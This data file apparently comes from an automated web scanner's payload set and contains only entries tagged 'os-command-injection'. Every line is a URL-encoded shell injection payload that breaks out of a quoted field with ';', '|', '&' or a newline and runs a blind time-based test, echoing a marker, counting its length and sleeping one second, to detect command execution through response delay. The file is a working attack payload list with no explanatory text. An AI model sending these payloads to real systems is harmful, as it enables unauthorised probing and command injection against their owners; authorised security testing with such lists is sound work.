+os-command-injection,'%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%27%7C%20%5B%201%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%27%7C%20%5B%202%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%27%7C%20%5B%203%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%27%7C%20%5B%204%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%27%7C%20%5B%205%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%27%7C%20%5B%206%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%27%7C%20%5B%207%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%27%7C%20%5B%208%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%27%7C%20%5B%209%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%27%7C%20%5B%201%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%27%7C%20%5B%202%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%27%7C%20%5B%203%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%27%7C%20%5B%204%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%27%7C%20%5B%205%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%27%7C%20%5B%206%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%27%7C%20%5B%207%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%27%7C%20%5B%208%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%27%7C%20%5B%209%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%27%7C%20%5B%201%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%27%7C%20%5B%202%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%27%7C%20%5B%203%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%27%7C%20%5B%204%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%27%7C%20%5B%205%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%27%7C%20%5B%206%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%27%7C%20%5B%207%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%27%7C%20%5B%208%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%27%7C%20%5B%209%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' 